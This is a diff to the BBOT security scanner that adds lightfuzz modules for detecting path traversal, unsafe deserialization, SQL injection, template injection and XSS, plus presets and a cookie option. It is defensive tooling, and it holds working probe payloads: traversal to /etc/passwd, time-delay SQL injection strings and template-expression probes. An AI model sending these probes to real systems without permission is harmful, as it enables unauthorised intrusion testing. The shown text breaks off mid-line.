+from urllib.parse import quote + + +class path(BaseLightfuzz): + friendly_name = "Path Traversal" + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=False) + if not probe_value: + self.debug( + f"Path Traversal detection requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + # Single dot traversal tolerance test + path_techniques = { + "single-dot traversal tolerance (no-encoding)": { + "singledot_payload": f"./a/../{probe_value}", + "doubledot_payload": f"../a/../{probe_value}", + }, + "single-dot traversal tolerance (no-encoding, leading slash)": { + "singledot_payload": f"/./a/../{probe_value}", + "doubledot_payload": f"/../a/../{probe_value}", + }, + "single-dot traversal tolerance (url-encoding)": { + "singledot_payload": quote(f"./a/../{probe_value}".encode(), safe=""), + "doubledot_payload": quote(f"../a/../{probe_value}".encode(), safe=""), + }, + "single-dot traversal tolerance (url-encoding, leading slash)": { + "singledot_payload": quote(f"/./a/../{probe_value}".encode(), safe=""), + "doubledot_payload": quote(f"/../a/../{probe_value}".encode(), safe=""), + }, + "single-dot traversal tolerance (non-recursive stripping)": { + "singledot_payload": f"...//a/....//{probe_value}", + "doubledot_payload": f"....//a/....//{probe_value}", + }, + "single-dot traversal tolerance (non-recursive stripping, leading slash)": { + "singledot_payload": f"/...//a/....//{probe_value}", + "doubledot_payload": f"/....//a/....//{probe_value}", + }, + "single-dot traversal tolerance (double url-encoding)": { + "singledot_payload": f".%252fa%252f..%252f{probe_value}", + "doubledot_payload": f"..%252fa%252f..%252f{probe_value}", + }, + "single-dot traversal tolerance (double url-encoding, leading slash)": { + "singledot_payload": f"%252f.%252fa%252f..%252f{probe_value}", + "doubledot_payload": f"%252f..%252fa%252f..%252f{probe_value}", + }, + } + + linux_path_regex = re.match(r"\/(?:\w+\/?)+\.\w+", probe_value) + if linux_path_regex is not None: + original_path_only = "/".join(probe_value.split("/")[:-1]) + original_filename_only = probe_value.split("/")[-1] + # Some servers validate the start of the path, so we construct our payload with the original path and filename + path_techniques["single-dot traversal tolerance (start of path validation)"] = { + "singledot_payload": f"{original_path_only}/./{original_filename_only}", + "doubledot_payload": f"{original_path_only}/../{original_filename_only}", + } + + for path_technique, payloads in path_techniques.items(): + iterations = 5 # one failed detection is tolerated, as long as its not the first run + confirmations = 0 + while iterations > 0: + try: + http_compare = self.compare_baseline( + self.event.data["type"], probe_value, cookies, skip_urlencoding=True + ) + singledot_probe = await self.compare_probe( + http_compare, + self.event.data["type"], + payloads["singledot_payload"], + cookies, + skip_urlencoding=True, + ) + doubledot_probe = await self.compare_probe( + http_compare, + self.event.data["type"], + payloads["doubledot_payload"], + cookies, + skip_urlencoding=True, + ) + # if singledot_probe[0] is true, the response is the same as the baseline. This indicates adding a single dot did not break the functionality + # next, if doubledot_probe[0] is false, the response is different from the baseline. This further indicates that a real path is being manipulated + # if doubledot_probe[3] is not None, the response is not empty. + # if doubledot_probe[1] is not ["header"], the response is not JUST a header change. + # "The requested URL was rejected" is a very common WAF error message which appears on 200 OK response, confusing detections + if ( + singledot_probe[0] is True + and doubledot_probe[0] is False + and doubledot_probe[3] is not None + and doubledot_probe[1] != ["header"] + and "The requested URL was rejected" not in doubledot_probe[3].text + ): + confirmations += 1 + self.verbose(f"Got possible Path Traversal detection: [{str(confirmations)}] Confirmations") + # only report if we have 3 confirmations + if confirmations > 3: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [{path_technique}]", + } + ) + # no need to report both techniques if they both work + break + except HttpCompareError as e: + iterations -= 1 + self.debug(e) + continue + + iterations -= 1 + if confirmations == 0: + break + + # Absolute path test, covering Windows and Linux + absolute_paths = { + r"c:\\windows\\win.ini": "; for 16-bit app support", + "/etc/passwd": "daemon:x:", + "../../../../../etc/passwd%00.png": "daemon:x:", + } + + for path, trigger in absolute_paths.items(): + r = await self.standard_probe(self.event.data["type"], cookies, path, skip_urlencoding=True) + if r and trigger in r.text: + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [Absolute Path: {path}]", + } + ) diff --git a/bbot/modules/lightfuzz/submodules/serial.py b/bbot/modules/lightfuzz/submodules/serial.py new file mode 100644 index 0000000000..5fb6cd7aaa --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/serial.py @@ -0,0 +1,168 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + + +class serial(BaseLightfuzz): + """ + This module finds places where serialized objects are being deserialized. + + It tests two possible deserialization cases. It starts by performing a baseline with a specially-crafted non-serialized payload, which successfully decodes via both base64 and hex. This is designed to coax out an error that's not decoding-specific. + + After performing the baseline (Which by design may contain an error), we check for two possible deserialization cases: + - Replacing the payload with a serialized object changes the status code to 200 (minus some string signatures to help prevent false positives) + - If the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response. + - Because of the possibility for false positives, we only consider responses that are 500s 200s where the body changed. + """ + + friendly_name = "Unsafe Deserialization" + + def is_possibly_serialized(self, value): + # Use the is_base64 method from BaseLightfuzz via self + if self.is_base64(value): + return True + + # Use the is_hex method from BaseLightfuzz via self + if self.is_hex(value): + return True + + # List of common PHP serialized data prefixes + php_serialized_prefixes = [ + "a:", # Array + "O:", # Object + "s:", # String + "i:", # Integer + "d:", # Double + "b:", # Boolean + "N;", # Null + ] + + # Check if the value starts with any of the PHP serialized prefixes + if any(value.startswith(prefix) for prefix in php_serialized_prefixes): + return True + return False + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + control_payload_hex = "f56124208220432ec767646acd2e6c6bc9622a62c5656f2eeb616e2f" + control_payload_base64 = "4Wt5fYx5Y3rELn5myS5oa996Ji7IZ28uwGdha4x6YmuMfG992CA=" + control_payload_php_raw = "z:0:{}" + # These payloads are benign, no-op, or otherwise harmless + # minimally sized valid serialized objects for their given language/platform + base64_serialization_payloads = { + "php_base64": "YTowOnt9", + "java_base64": "rO0ABXNyABFqYXZhLmxhbmcuQm9vbGVhbs0gcoDVnPruAgABWgAFdmFsdWV4cAA=", + "java_base64_string_error": "rO0ABXQABHRlc3Q=", + "java_base64_OptionalDataException": "rO0ABXcEAAAAAAEAAAABc3IAEGphdmEudXRpbC5IYXNoTWFwAAAAAAAAAAECAAJMAARrZXkxYgABAAAAAAAAAAJ4cHcBAAAAB3QABHRlc3Q=", + "dotnet_base64": "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==", + "ruby_base64": "BAh7BjoKbE1FAAVJsg==", + } + + hex_serialization_payloads = { + "java_hex": "ACED00057372000E6A6176612E6C616E672E426F6F6C65616ECD207EC0D59CF6EE02000157000576616C7565787000", + "java_hex_OptionalDataException": "ACED0005737200106A6176612E7574696C2E486173684D617000000000000000012000014C00046B6579317A00010000000000000278707000000774000474657374", + "dotnet_hex": "0001000000ffffffff01000000000000000601000000076775737461766f0b", + } + + php_raw_serialization_payloads = { + "php_raw": "a:0:{}", + } + + serialization_errors = [ + "invalid user", + "cannot cast java.lang.string", + "dump format error", + "java.io.optionaldataexception", + ] + + general_errors = [ + "Internal Error", + "Internal Server Error", + "The requested URL was rejected", + ] + + probe_value = self.incoming_probe_value(populate_empty=False) + if probe_value: + if self.is_possibly_serialized(probe_value): + self.debug( + f"Existing value is not ruled out for being a serialized object, proceeding [{self.event.data['type']}] [{self.event.data['name']}]" + ) + else: + self.debug( + f"The Serialization Submodule only operates when there is no original value, or when the original value could potentially be a serialized object, aborting [{self.event.data['type']}] [{self.event.data['name']}]" + ) + return + + try: + http_compare_hex = self.compare_baseline(self.event.data["type"], control_payload_hex, cookies) + http_compare_base64 = self.compare_baseline(self.event.data["type"], control_payload_base64, cookies) + http_compare_php_raw = self.compare_baseline(self.event.data["type"], control_payload_php_raw, cookies) + except HttpCompareError as e: + self.debug(f"HttpCompareError encountered: {e}") + return + + # Proceed with payload probes + for payload_set, payload_baseline in [ + (base64_serialization_payloads, http_compare_base64), + (hex_serialization_payloads, http_compare_hex), + (php_raw_serialization_payloads, http_compare_php_raw), + ]: + for type, payload in payload_set.items(): + try: + matches_baseline, diff_reasons, reflection, response = await self.compare_probe( + payload_baseline, self.event.data["type"], payload, cookies + ) + except HttpCompareError as e: + self.debug(f"HttpCompareError encountered: {e}") + continue + + if matches_baseline: + self.debug(f"Payload {type} matches baseline, skipping") + continue + + self.debug(f"Probe result for {type}: {response}") + + status_code = getattr(response, "status_code", 0) + if status_code == 0: + continue + + if diff_reasons == ["header"]: + self.debug(f"Only header diffs found for {type}, skipping") + continue + + if status_code not in (200, 500): + self.debug(f"Status code {status_code} not in (200, 500), skipping") + continue + + # if the status code changed to 200, and the response doesn't match our general error exclusions, we have a finding + self.debug(f"Potential finding detected for {type}, needs confirmation") + if ( + status_code == 200 + and "code" in diff_reasons + and not any( + error in response.text for error in general_errors + ) # ensure the 200 is not actually an error + ): + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Error Resolution] Serialization Payload: [{type}]", + } + ) + # if the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response. + # but only if the response is a 500, or a 200 with a body diff + elif status_code == 500 or (status_code == 200 and diff_reasons == ["body"]): + self.debug(f"500 status code or body match for {type}") + for serialization_error in serialization_errors: + # check for the error string, but also ensure the error string isn't just always present in the response + if ( + serialization_error in response.text.lower() + and serialization_error not in payload_baseline.baseline.text.lower() + ): + self.debug(f"Error string '{serialization_error}' found in response for {type}") + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Differential Error Analysis] Error-String: [{serialization_error}] Payload: [{type}]", + } + ) + break diff --git a/bbot/modules/lightfuzz/submodules/sqli.py b/bbot/modules/lightfuzz/submodules/sqli.py new file mode 100644 index 0000000000..8477179b74 --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/sqli.py @@ -0,0 +1,171 @@ +from .base import BaseLightfuzz +from bbot.errors import HttpCompareError + +import statistics + + +class sqli(BaseLightfuzz): + friendly_name = "SQL Injection" + + expected_delay = 5 + # These are common error strings that strongly indicate SQL injection + sqli_error_strings = [ + "Unterminated string literal", + "Failed to parse string literal", + "error in your SQL syntax", + "syntax error at or near", + "Unknown column", + "unterminated quoted string", + "Unclosed quotation mark", + "Incorrect syntax near", + "SQL command not properly ended", + "string not properly terminated", + ] + + def evaluate_delay(self, mean_baseline, measured_delay): + """ + Evaluates if a measured delay falls within an expected range, indicating potential SQL injection. + + Parameters: + - mean_baseline (float): The average baseline delay measured from non-injected requests. + - measured_delay (float): The delay measured from a potentially injected request. + + Returns: + - bool: True if the measured delay is within the expected range or exactly twice the expected delay, otherwise False. + + The function checks if the measured delay is within a margin of the expected delay or twice the expected delay, + accounting for cases where the injected statement might be executed twice. + """ + margin = 1.5 + if ( + mean_baseline + self.expected_delay - margin + <= measured_delay + <= mean_baseline + self.expected_delay + margin + ): + return True + # check for exactly twice the delay, in case the statement gets placed in the query twice (a common occurrence) + elif ( + mean_baseline + (self.expected_delay * 2) - margin + <= measured_delay + <= mean_baseline + (self.expected_delay * 2) + margin + ): + return True + else: + return False + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + probe_value = self.incoming_probe_value(populate_empty=True) + http_compare = self.compare_baseline( + self.event.data["type"], probe_value, cookies, additional_params_populate_empty=True + ) + + try: + # send the with a single quote, and then another with two single quotes + single_quote = await self.compare_probe( + http_compare, + self.event.data["type"], + f"{probe_value}'", + cookies, + additional_params_populate_empty=True, + ) + double_single_quote = await self.compare_probe( + http_compare, + self.event.data["type"], + f"{probe_value}''", + cookies, + additional_params_populate_empty=True, + ) + # if the single quote probe response is different from the baseline + if single_quote[0] is False: + # check for common SQL error strings in the response + for sqli_error_string in self.sqli_error_strings: + if sqli_error_string.lower() in single_quote[3].text.lower(): + self.results.append( + { + "type": "FINDING", + "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [SQL Error Detection] Detected String: [{sqli_error_string}]", + } + ) + break + # if both probes were successful (and had a response) + if single_quote[3] and double_single_quote[3]: + # Ensure none of the status codes are "429" + if ( + single_quote[3].status_code != 429 + and double_single_quote[3].status_code != 429 + and http_compare.baseline.status_code != 429 + ): # prevent false positives from rate limiting + # if the code changed in the single quote probe, and the code is NOT the same between that and the double single quote probe, SQL injection is indicated + if "code" in single_quote[1] and ( + single_quote[3].status_code != double_single_quote[3].status_code + ): + self.results.append( + { + "type": "FINDING", + "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [Single Quote/Two Single Quote, Code Change ({http_compare.baseline.status_code}->{single_quote[3].status_code}->{double_single_quote[3].status_code})]", + } + ) + else: + self.debug("Failed to get responses for both single_quote and double_single_quote") + except HttpCompareError as e: + self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}") + + # These are common SQL injection payloads for inducing an intentional delay across several different SQL database types + standard_probe_strings = [ + f"'||pg_sleep({str(self.expected_delay)})--", # postgres + f"1' AND (SLEEP({str(self.expected_delay)})) AND '", # mysql + f"' AND (SELECT FROM DBMS_LOCK.SLEEP({str(self.expected_delay)})) AND '1'='1" # oracle (not tested) + f"; WAITFOR DELAY '00:00:{str(self.expected_delay)}'--", # mssql (not tested) + ] + + baseline_1 = await self.standard_probe( + self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True + ) + baseline_2 = await self.standard_probe( + self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True + ) + + # get a baseline from two different probes. We will average them to establish a mean baseline + if baseline_1 and baseline_2: + baseline_1_delay = baseline_1.elapsed.total_seconds() + baseline_2_delay = baseline_2.elapsed.total_seconds() + mean_baseline = statistics.mean([baseline_1_delay, baseline_2_delay]) + + for p in standard_probe_strings: + confirmations = 0 + for i in range(0, 3): + # send the probe 3 times, and check if the delay is within the detection threshold + r = await self.standard_probe( + self.event.data["type"], + cookies, + f"{probe_value}{p}", + additional_params_populate_empty=True, + timeout=20, + ) + if not r: + self.debug("delay measure request failed") + break + + d = r.elapsed.total_seconds() + self.debug(f"measured delay: {str(d)}") + if self.evaluate_delay( + mean_baseline, d + ): # decide if the delay is within the detection threshold and constitutes a successful sleep execution + confirmations += 1 + self.debug( + f"{self.event.data['url']}:{self.event.data['name']}:{self.event.data['type']} Increasing confirmations, now: {str(confirmations)} " + ) + else: + break + + if confirmations == 3: + self.results.append( + { + "type": "FINDING", + "description": f"Possible Blind SQL Injection. {self.metadata()} Detection Method: [Delay Probe ({p})]", + } + ) + + else: + self.debug("Could not get baseline for time-delay tests") diff --git a/bbot/modules/lightfuzz/submodules/ssti.py b/bbot/modules/lightfuzz/submodules/ssti.py new file mode 100644 index 0000000000..f28710aa4e --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/ssti.py @@ -0,0 +1,30 @@ +from .base import BaseLightfuzz + + +class ssti(BaseLightfuzz): + friendly_name = "Server-side Template Injection" + + async def fuzz(self): + cookies = self.event.data.get("assigned_cookies", {}) + # These are common SSTI payloads, each attempting to trigger an integer multiplication which would produce an expected value + ssti_probes = [ + "<%25%3d%201337*1337%20%25>", + "<%= 1337*1337 %>", + "${1337*1337}", + "%24%7b1337*1337%7d", + "1,787{{z}},569", + ] + for probe_value in ssti_probes: + r = await self.standard_probe( + self.event.data["type"], cookies, probe_value, allow_redirects=True, skip_urlencoding=True + ) + + # look for the expected value in the response + if r and ("1787569" in r.text or "1,787,569" in r.text): + self.results.append( + { + "type": "FINDING", + "description": f"POSSIBLE Server-side Template Injection. {self.metadata()} Detection Method: [Integer Multiplication] Payload: [{probe_value}]", + } + ) + break diff --git a/bbot/modules/lightfuzz/submodules/xss.py b/bbot/modules/lightfuzz/submodules/xss.py new file mode 100644 index 0000000000..965121daf3 --- /dev/null +++ b/bbot/modules/lightfuzz/submodules/xss.py @@ -0,0 +1,168 @@ +from .base import BaseLightfuzz + +import regex as re + + +class xss(BaseLightfuzz): + friendly_name = "Cross-Site Scripting" + + async def determine_context(self, cookies, html, random_string): + """ + Determines the context of the random string in the HTML response. + With XSS, the context is what kind part of the page the injection is occuring in, which determine what payloads might be successful + + https://portswigger.net/web-security/cross-site-scripting/contexts + """ + between_tags = False + in_tag_attribute = False + in_javascript = False + + between_tags_regex = re.compile( + rf"<(\/?\w+)[^>]*>.*?{random_string}.*?<\/?\w+>" + ) # The between tags context is when the injection occurs between HTML tags + in_tag_attribute_regex = re.compile( + rf'<(\w+)\s+[^>]*?(\w+)="([^"]*?{random_string}[^"]*?)"[^>]*>' + ) # The in tag attribute context is when the injection occurs in an attribute of an HTML tag + in_javascript_regex = re.compile( + rf"]*>[^<]*(?:<(?!\/script>)[^<]*)*{random_string}[^<]*(?:<(?!\/script>)[^<]*)*<\/script>" + ) # The in javascript context is when the injection occurs within a " + result = await self.check_probe( + cookies, in_javascript_probe, in_javascript_probe, "In Javascript" + ) # After reflection in the HTTP response, did the script tags survive without url-encoding or other sanitization/escaping? + if result is False: + # To attempt this technique, we need to determine the type of quote we are within + quote_context = await self.determine_javascript_quote_context( + random_string, reflection_probe_result.text + ) + + # Skip the test if the context is outside + if quote_context == "outside": + return + + # Update probes based on the quote context + if quote_context == "single": + in_javascript_escape_probe = rf"a\';zzzzz({random_string})\\" + in_javascript_escape_match = rf"a\\';zzzzz({random_string})\\" + elif quote_context == "double": + in_javascript_escape_probe = rf"a\";zzzzz({random_string})\\" + in_javascript_escape_match = rf'a\\";zzzzz({random_string})\\' + + await self.check_probe( + cookies, + in_javascript_escape_probe, + in_javascript_escape_match, + f"In Javascript (escaping the escape character, {quote_context} quote)", + ) diff --git a/bbot/modules/deadly/nuclei.py b/bbot/modules/nuclei.py similarity index 99% rename from bbot/modules/deadly/nuclei.py rename to bbot/modules/nuclei.py index b973c714bc..440fa580da 100644 --- a/bbot/modules/deadly/nuclei.py +++ b/bbot/modules/nuclei.py @@ -7,7 +7,7 @@ class nuclei(BaseModule): watched_events = ["URL"] produced_events = ["FINDING", "VULNERABILITY", "TECHNOLOGY"] - flags = ["active", "aggressive"] + flags = ["active", "aggressive", "deadly"] meta = { "description": "Fast and customisable vulnerability scanner", "created_date": "2022-03-12", diff --git a/bbot/modules/paramminer_headers.py b/bbot/modules/paramminer_headers.py index cd3648ada0..e3b3e4aa3f 100644 --- a/bbot/modules/paramminer_headers.py +++ b/bbot/modules/paramminer_headers.py @@ -52,6 +52,7 @@ class paramminer_headers(BaseModule): "javascript", "keep-alive", "label", + "max-forwards", "negotiate", "proxy", "range", @@ -148,6 +149,7 @@ async def process_results(self, event, results): "type": paramtype, "description": description, "name": result, + "original_value": None, }, "WEB_PARAMETER", event, diff --git a/bbot/modules/reflected_parameters.py b/bbot/modules/reflected_parameters.py new file mode 100644 index 0000000000..f7e17e57e6 --- /dev/null +++ b/bbot/modules/reflected_parameters.py @@ -0,0 +1,80 @@ +from bbot.modules.base import BaseModule + + +class reflected_parameters(BaseModule): + watched_events = ["WEB_PARAMETER"] + produced_events = ["FINDING"] + flags = ["active", "safe", "web-thorough"] + meta = { + "description": "Highlight parameters that reflect their contents in response body", + "author": "@liquidsec", + "created_date": "2024-10-29", + } + + async def handle_event(self, event): + url = event.data.get("url") + reflection_detected = await self.detect_reflection(event, url) + + if reflection_detected: + param_type = event.data.get("type", "UNKNOWN") + description = ( + f"[{param_type}] Parameter value reflected in response body. Name: [{event.data['name']}] " + f"Source Module: [{str(event.module)}]" + ) + if event.data.get("original_value"): + description += ( + f" Original Value: [{self.helpers.truncate_string(str(event.data['original_value']), 200)}]" + ) + data = {"host": str(event.host), "description": description, "url": url} + await self.emit_event(data, "FINDING", event) + + async def detect_reflection(self, event, url): + """Detects reflection by sending a probe with a random value and a canary parameter.""" + probe_parameter_name = event.data["name"] + probe_parameter_value = self.helpers.rand_string() + canary_parameter_value = self.helpers.rand_string() + probe_response = await self.send_probe_with_canary( + event, + probe_parameter_name, + probe_parameter_value, + canary_parameter_value, + cookies=event.data.get("assigned_cookies", {}), + timeout=10, + ) + + # Check if the probe parameter value is reflected AND the canary is not + if probe_response: + response_text = probe_response.text + reflection_result = probe_parameter_value in response_text and canary_parameter_value not in response_text + return reflection_result + return False + + async def send_probe_with_canary(self, event, parameter_name, parameter_value, canary_value, cookies, timeout=10): + method = "GET" + url = event.data["url"] + headers = {} + data = None + json_data = None + params = {parameter_name: parameter_value, "c4n4ry": canary_value} + + if event.data["type"] == "GETPARAM": + url = f"{url}?{parameter_name}={parameter_value}&c4n4ry={canary_value}" + elif event.data["type"] == "COOKIE": + cookies.update(params) + elif event.data["type"] == "HEADER": + headers.update(params) + elif event.data["type"] == "POSTPARAM": + method = "POST" + data = params + elif event.data["type"] == "BODYJSON": + method = "POST" + json_data = params + + self.debug( + f"Sending {method} request to {url} with headers: {headers}, cookies: {cookies}, data: {data}, json: {json_data}" + ) + + response = await self.helpers.request( + method=method, url=url, headers=headers, cookies=cookies, data=data, json=json_data, timeout=timeout + ) + return response diff --git a/bbot/modules/deadly/vhost.py b/bbot/modules/vhost.py similarity index 98% rename from bbot/modules/deadly/vhost.py rename to bbot/modules/vhost.py index 29aa5b6438..0c8759f097 100644 --- a/bbot/modules/deadly/vhost.py +++ b/bbot/modules/vhost.py @@ -1,13 +1,13 @@ import base64 from urllib.parse import urlparse -from bbot.modules.deadly.ffuf import ffuf +from bbot.modules.ffuf import ffuf class vhost(ffuf): watched_events = ["URL"] produced_events = ["VHOST", "DNS_NAME"] - flags = ["active", "aggressive", "slow"] + flags = ["active", "aggressive", "slow", "deadly"] meta = {"description": "Fuzz for virtual hosts", "created_date": "2022-05-02", "author": "@liquidsec"} special_vhost_list = ["127.0.0.1", "localhost", "host.docker.internal"] diff --git a/bbot/presets/web/lightfuzz-intense.yml b/bbot/presets/web/lightfuzz-intense.yml new file mode 100644 index 0000000000..7adf876468 --- /dev/null +++ b/bbot/presets/web/lightfuzz-intense.yml @@ -0,0 +1,30 @@ +description: Discover web parameters and lightly fuzz them for vulnerabilities, with more intense discovery techniques + +flags: + - web-paramminer + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: True + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [cmdi,crypto,nosqli,path,serial,sqli,ssti,xss] + disable_post: False + excavate: + retain_querystring: True + +conditions: + - | + {% if config.web.spider_distance == 0 %} + {{ warn("The lightfuzz-intense preset works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-max.yml b/bbot/presets/web/lightfuzz-max.yml new file mode 100644 index 0000000000..1f788bec5b --- /dev/null +++ b/bbot/presets/web/lightfuzz-max.yml @@ -0,0 +1,31 @@ +description: Discover web parameters and lightly fuzz them for vulnerabilities, with the most intense discovery techniques + +flags: + - web-paramminer + +modules: + - httpx + - lightfuzz + - robots + - badsecrets + - hunt + - reflected_parameters + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: False + modules: + lightfuzz: + force_common_headers: True + enabled_submodules: [cmdi,crypto,nosqli,path,serial,sqli,ssti,xss] + disable_post: False + excavate: + retain_querystring: True + speculate_params: True + +conditions: +- | + {% if config.web.spider_distance == 0 %} + {{ warn("The lightfuzz-max preset works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-min.yml b/bbot/presets/web/lightfuzz-min.yml new file mode 100644 index 0000000000..b8247b6f59 --- /dev/null +++ b/bbot/presets/web/lightfuzz-min.yml @@ -0,0 +1,23 @@ +description: Discover web parameters and lightly fuzz them for vulnerabilities, with only the most common vulnerabilities and minimal extra modules + +modules: + - httpx + - lightfuzz + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: True + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [path,sqli,xss] # only look for the most common vulnerabilities + disable_post: True + excavate: + retain_querystring: True + +conditions: +- | + {% if config.web.spider_distance == 0 %} + {{ warn("The lightfuzz-min preset works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz-xss.yml b/bbot/presets/web/lightfuzz-xss.yml new file mode 100644 index 0000000000..cc6bc9bbc8 --- /dev/null +++ b/bbot/presets/web/lightfuzz-xss.yml @@ -0,0 +1,21 @@ +description: Discover web parameters and lightly fuzz them, optimized for looking just for xss vulnerabilities +modules: + - httpx + - lightfuzz + - paramminer_getparams + - reflected_parameters + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: False + modules: + lightfuzz: + enabled_submodules: [xss] + disable_post: True + +conditions: + - | + {% if config.web.spider_distance == 0 %} + {{ warn("The lightfuzz-xss preset works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/lightfuzz.yml b/bbot/presets/web/lightfuzz.yml new file mode 100644 index 0000000000..7ccf0edb3d --- /dev/null +++ b/bbot/presets/web/lightfuzz.yml @@ -0,0 +1,26 @@ +description: Discover web parameters and lightly fuzz them for vulnerabilities, without some of the more intense discovery techniques + +modules: + - httpx + - lightfuzz + - badsecrets + - hunt + - reflected_parameters + - portfilter + +config: + url_querystring_remove: False + url_querystring_collapse: True + modules: + lightfuzz: + force_common_headers: False + enabled_submodules: [cmdi,crypto,nosqli,path,serial,sqli,ssti,xss] + disable_post: True + excavate: + retain_querystring: True + +conditions: + - | + {% if config.web.spider_distance == 0 %} + {{ warn("Lightfuzz works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/presets/web/paramminer.yml b/bbot/presets/web/paramminer.yml index 7d36e3a849..3057a1b3a9 100644 --- a/bbot/presets/web/paramminer.yml +++ b/bbot/presets/web/paramminer.yml @@ -1,12 +1,15 @@ -description: Discover new web parameters via brute-force +description: Discover new web parameters via brute-force, and analyze them with additional modules flags: - web-paramminer modules: - httpx + - reflected_parameters + - hunt -config: - web: - spider_distance: 1 - spider_depth: 4 +conditions: + - | + {% if config.web.spider_distance == 0 %} + {{ warn("The paramminer preset works much better with spider enabled! Consider adding 'spider' or 'spider-intense' preset.") }} + {% endif %} \ No newline at end of file diff --git a/bbot/scanner/preset/args.py b/bbot/scanner/preset/args.py index a1bf8a693c..7d206d7f3f 100644 --- a/bbot/scanner/preset/args.py +++ b/bbot/scanner/preset/args.py @@ -163,6 +163,9 @@ def preset_from_args(self): if self.parsed.custom_headers: args_preset.core.merge_custom({"web": {"http_headers": self.parsed.custom_headers}}) + if self.parsed.custom_cookies: + args_preset.core.merge_custom({"web": {"http_cookies": self.parsed.custom_cookies}}) + if self.parsed.custom_yara_rules: args_preset.core.merge_custom( {"modules": {"excavate": {"custom_yara_rules": self.parsed.custom_yara_rules}}} @@ -362,6 +365,13 @@ def create_parser(self, *args, **kwargs): default=[], help="List of custom headers as key value pairs (header=value).", ) + misc.add_argument( + "-C", + "--custom-cookies", + nargs="+", + default=[], + help="List of custom cookies as key value pairs (cookie=value).", + ) misc.add_argument("--custom-yara-rules", "-cy", help="Add custom yara rules to excavate") misc.add_argument("--user-agent", "-ua", help="Set the user-agent for all HTTP requests") @@ -407,6 +417,22 @@ def sanitize_args(self): custom_headers_dict[k] = v self.parsed.custom_headers = custom_headers_dict + # Custom Cookie Parsing / Validation + custom_cookies_dict = {} + custom_cookie_example = "Example: --custom-cookies foo=bar foo2=bar2" + + for i in self.parsed.custom_cookies: + parts = i.split("=", 1) + if len(parts) != 2: + raise ValidationError(f"Custom cookies not formatted correctly (missing '='). {custom_cookie_example}") + k, v = parts + if not k or not v: + raise ValidationError( + f"Custom cookies not formatted correctly (missing cookie name or value). {custom_cookie_example}" + ) + custom_cookies_dict[k] = v + self.parsed.custom_cookies = custom_cookies_dict + # --fast-mode if self.parsed.fast_mode: self.parsed.preset += ["fast"] diff --git a/bbot/scanner/scanner.py b/bbot/scanner/scanner.py index 01d9654c87..28dd8df56a 100644 --- a/bbot/scanner/scanner.py +++ b/bbot/scanner/scanner.py @@ -213,6 +213,12 @@ def __init__( self.warning( "You have enabled custom HTTP headers. These will be attached to all in-scope requests and all requests made by httpx." ) + # custom HTTP cookies warning + self.custom_http_cookies = self.web_config.get("http_cookies", {}) + if self.custom_http_cookies: + self.warning( + "You have enabled custom HTTP cookies. These will be attached to all in-scope requests and all requests made by httpx." + ) # url file extensions self.url_extension_blacklist = {e.lower() for e in self.config.get("url_extension_blacklist", [])} diff --git a/bbot/test/test_step_1/test__module__tests.py b/bbot/test/test_step_1/test__module__tests.py index e50f67a910..583a9064c4 100644 --- a/bbot/test/test_step_1/test__module__tests.py +++ b/bbot/test/test_step_1/test__module__tests.py @@ -18,7 +18,9 @@ def test__module__tests(): preset = Preset() # make sure each module has a .py file - for module_name in preset.module_loader.preloaded(): + for module_name, preloaded in preset.module_loader.preloaded().items(): + if module_name == "ssti": + log.critical(f"MODULE NAME: {module_name} / {preloaded}") module_name = module_name.lower() assert module_name in module_test_files, f'No test file found for module "{module_name}"' diff --git a/bbot/test/test_step_1/test_helpers.py b/bbot/test/test_step_1/test_helpers.py index 9cec291941..12fb15278f 100644 --- a/bbot/test/test_step_1/test_helpers.py +++ b/bbot/test/test_step_1/test_helpers.py @@ -460,6 +460,13 @@ async def test_helpers_misc(helpers, scan, bbot_scanner, bbot_httpserver): s = "asdf {unused} {used}" assert helpers.safe_format(s, used="fdsa") == "asdf {unused} fdsa" + # is_printable + assert helpers.is_printable("asdf") is True + assert helpers.is_printable(r"""~!@#$^&*()_+=-<>:"?,./;'[]\{}|""") is True + assert helpers.is_printable("ドメイン.テスト") is True + assert helpers.is_printable("4") is True + assert helpers.is_printable("asdf\x00") is 